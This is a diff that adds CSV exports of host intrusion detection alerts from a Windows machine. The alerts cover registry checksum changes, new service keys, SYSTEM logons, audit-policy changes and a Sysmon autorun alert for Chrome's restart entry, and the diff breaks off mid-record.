+"Apr 24, 2020 @ 13:19:12.041",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +New md5sum is : '64365e10e79becaacc4b6257a583c30a' +Old sha1sum was: 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +New sha1sum is : '18c33905fecebf510aa8a907616f86a31385ab5e' +", +"Apr 24, 2020 @ 13:19:10.998",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 13:19:09.607",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'a5e73c9f12ca5ca1a2e91341b6d7e1e1' +New md5sum is : '25ef42efe37ad3eed184fd9bb31305d4' +Old sha1sum was: 'ddad54675629131da3047b42c43628bd747e5262' +New sha1sum is : '4aa3eb6eb04b0d62d1a922458a12321e137ff48b' +", +"Apr 24, 2020 @ 13:19:05.822",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '106c676c812191a74d1c845f04603231' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '935b4cfc84744b913c948f1140563c880fa44307' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 13:19:03.589",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '6fba24441f7c19e08b81d5840e9e62af' +New md5sum is : '5689c2dd6ed61a04cc389b6099c0aea5' +Old sha1sum was: '915cf0aee85628bc7ab27c3b65968f0090fc5e9a' +New sha1sum is : '64932df77c40a56e97edb3553ce359b3aaff132e' +", +"Apr 24, 2020 @ 13:19:03.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'abe41aab895e504aa874d1b2b8792e94' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '9daf66238ba18f6f989346a0d4ba77fa2e949329' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 13:19:03.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'b53bf2f3f61682c350be645945192116' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 24, 2020 @ 13:18:57.308",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:15:54Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:18:56.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'f7e3ede101883838642b014adb830ba3' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '77ead1a75e96863caf4602afa49e9fabf7cf3623' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 13:18:54.573",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:54.557",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:53.980",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:53.971",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:52.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:52.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:51.591",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '8879c1edeb0f0361bd37d770e7639bb2' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '17ce46a3267c30cb6b7fdcabb90044e72d2e065c' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 13:18:49.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'fb276bc3254926295315efd699a5f0ce' +New md5sum is : '0730f5b2407e5339e63c1c3734fd2546' +Old sha1sum was: 'b7489e940ba2819e44a06f3b6c370f25b1bd5a26' +New sha1sum is : '4235ab187e25827a7b2ebbab7afab242b93a9080' +", +"Apr 24, 2020 @ 13:18:47.698",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '38693b218d0d1cfbe8aa44b2759f5e0a' +New md5sum is : '860a7b9ab2a6fbf545bfc384440a8e7b' +Old sha1sum was: '7e71bd80049f0a54f2ff10b576253aee0f92597e' +New sha1sum is : 'f39274c3af5f370a839f6377680dcf2fc740aa48' +", +"Apr 24, 2020 @ 13:18:46.760",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'f7ff7d512129b2231c517bc98c61895a' +New md5sum is : 'dee9fe5e4e31860f2ee77873f5d87534' +Old sha1sum was: '8ad4b6c00e384185ef05b860966037e851115017' +New sha1sum is : '00a0e6ea5491f52170666054348def61f8210cb5' +", +"Apr 24, 2020 @ 13:18:46.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:46.634",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f13d\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:18:46.619",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:42.432",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'a635cc7d63339ac3075b507a97dc0727' +New md5sum is : 'f93d80905ae8d4f7b3b1d14093e01cfb' +Old sha1sum was: '2ab013a07ae2703176febea130ae9ddc53ac1615' +New sha1sum is : '76dfbf0000655365da25fcaeae59a5577fea6d3e' +", +"Apr 24, 2020 @ 13:18:41.104",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '1de56df874baf63b698941817624f3e7' +New md5sum is : '0730f5b2407e5339e63c1c3734fd2546' +Old sha1sum was: '5bae7edca7bfded5a62882384016c3e950aa6ada' +New sha1sum is : '4235ab187e25827a7b2ebbab7afab242b93a9080' +", +"Apr 24, 2020 @ 13:18:36.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '549d5493f97506ca14eb416c7cc49e4d' +New md5sum is : 'a839274b2b2581686d6377468ce22fb7' +Old sha1sum was: '48103930a75d17911b2f04f0163afdbadea50b74' +New sha1sum is : 'b3588e247e7e973a4ff788f4b76b45e3f484e8ad' +", +"Apr 24, 2020 @ 13:18:36.025",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed. +Old md5sum was: '7623ffed143b7459169ba5677dbcbf32' +New md5sum is : '8689e28cb67cdeb16cd0f213c561238e' +Old sha1sum was: '0a808618d3ad142d9f619d043ca088fdcfc9a841' +New sha1sum is : '9a0d97c845587be7605acb61023bb439126934df' +", +"Apr 24, 2020 @ 13:18:35.963",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '1de56df874baf63b698941817624f3e7' +New md5sum is : '0730f5b2407e5339e63c1c3734fd2546' +Old sha1sum was: '5bae7edca7bfded5a62882384016c3e950aa6ada' +New sha1sum is : '4235ab187e25827a7b2ebbab7afab242b93a9080' +", +"Apr 24, 2020 @ 13:18:34.900",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '1c6e2319780c0264f929f3c3433add82' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'f924403989ef2de336c156640b73fb0db5024306' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 13:18:27.386",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:18:27.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '6073decf84a173eeedd11a3559b16ec1' +New md5sum is : '318460bc67692e1abeb6ac8620e2d5d2' +Old sha1sum was: 'f18af090c617e4708f33242930b7538c92479f32' +New sha1sum is : 'f3d4f1d8d84044bd1af1d2710eba79efdc96081d' +", +"Apr 24, 2020 @ 13:18:22.931",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Chrome' checksum changed. +Old md5sum was: '22ece9a19429dc28f03e236b27d22f81' +New md5sum is : '5af3a18aae7113a12564a454973b2929' +Old sha1sum was: 'd43b78e147f35d6834e93dded1d3c6395c512b09' +New sha1sum is : '0a00a2e519a32df06bc9533712e616c7a04e7c55' +", +"Apr 24, 2020 @ 13:18:21.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DsmSvc\State' checksum changed. +Old md5sum was: '337372d37495ffa03af7fb2939b06f7c' +New md5sum is : '0198bcaeee59286a64643354db674151' +Old sha1sum was: '061dc9d6d1ad801983b5a20ed55b6e67deb57c75' +New sha1sum is : 'dbca19c2b9d5df7e6bfc7f3a68bbf2892febac0b' +", +"Apr 24, 2020 @ 13:18:20.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: 'cce358497fdfdde2833a161f70210463' +New md5sum is : 'ceb071f7c3931d375ab5d39f59ceb095' +Old sha1sum was: 'd63f655305d47c49eeeee9df2ad94c7fd2ec28a2' +New sha1sum is : 'e67a17f8a2b27be4d2f41ac9baaed61e4f01e5e4' +", +"Apr 24, 2020 @ 13:18:19.244",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:19.229",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:19.151",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:19.135",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:18.876",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:18.857",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:17.838",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:17.823",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:17.637",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:17.623",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:15.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +New md5sum is : '64365e10e79becaacc4b6257a583c30a' +Old sha1sum was: 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +New sha1sum is : '18c33905fecebf510aa8a907616f86a31385ab5e' +", +"Apr 24, 2020 @ 13:18:14.416",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:14.403",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:14.246",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:14.230",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:14.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:14.135",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:13.744",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 13:18:11.908",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:11.879",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 13:18:11.845",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 13:18:11.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 13:18:11.738",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 13:18:11.719",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:18:11.705",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:11.521",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +", +"Apr 24, 2020 @ 13:18:10.655",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:10.638",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:10.323",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f95a12e467bbf352a90602d9f025d5d' +New md5sum is : '8bb6c0956c2766c58c1a9a1efc45a28c' +Old sha1sum was: 'c5c884aae620a6430070a4a03dc8d115ad37148f' +New sha1sum is : '9987f79cd34a26b46e6fd604087e2270b8c49cf1' +", +"Apr 24, 2020 @ 13:18:10.307",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a73a335588651cfda297cd10b7ebe55e' +New md5sum is : '105e7d5045a9d20c4e9bfe6e31c4d5f4' +Old sha1sum was: '36e61788f9f92ff546c43f33c5b94f4b7e4609ce' +New sha1sum is : '3b1edbab1cd6af7b0103a1e985a900a15cd3d2f1' +", +"Apr 24, 2020 @ 13:18:10.275",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'f90b0689dbdea07bf5bf46f391e73bca' +New md5sum is : '9b2eb62ca4c74330ffa1448b22e6dfac' +Old sha1sum was: '718d3adbe4f76654fbcafae76e4dc88b8a9b8325' +New sha1sum is : '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +", +"Apr 24, 2020 @ 13:18:07.776",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:07.763",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:07.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\3ware' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '595060ae771257ec03dd9741fec6cfd7' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'e5d103c64c3ec5b88f4f27f429c3b297a39c7d95' +", +"Apr 24, 2020 @ 13:17:41.088",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:16:38Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:17:34.918",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:17:33.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'bec7923af911bc42900a4d74cc4d4af4' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: '5456e9d4456d03fb3f15c7ac02d91333683f3043' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", diff --git a/data/MW_15_HIDS_3.csv b/data/MW_15_HIDS_3.csv new file mode 100644 index 0000000..693fd41 --- /dev/null +++ b/data/MW_15_HIDS_3.csv @@ -0,0 +1,72 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 17:58:14.891",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '32d67903586d935a6926ee021a657f19' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '1ad1aa9999e1eafd661aa0303b51307310f5088f' +", +"May 22, 2020 @ 17:58:14.887",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '8999bd4a5ea0eeed0dd920d7e30ffee2' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : 'a08f01e683a5864c95f899a000531cacef39c721' +", +"May 22, 2020 @ 17:55:53.948",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:11.263 +ProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0 +Details: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:11.276963800Z"",""eventRecordID"":""1191"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:11.263\r\nProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:11.263"",""processGuid"":""{df9fc3d3-d0cd-5ec7-0000-001050a30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}", +"May 22, 2020 @ 17:51:52.829",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 17:50:36.455",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 17:50:36.439",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 17:50:28.063",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '7a6925496501f6eab705d5c7ab038696' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '8bdc84c00ad75f8b65e6fa6eb585f0d689061628' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +", +"May 22, 2020 @ 17:50:28.047",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '15a74f51d7a0d4e1ac30c4b6d7d50bc1' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '896016bfa429eaf3f1b7ca668d65033c1814feee' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +", +"May 22, 2020 @ 17:50:23.425",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet 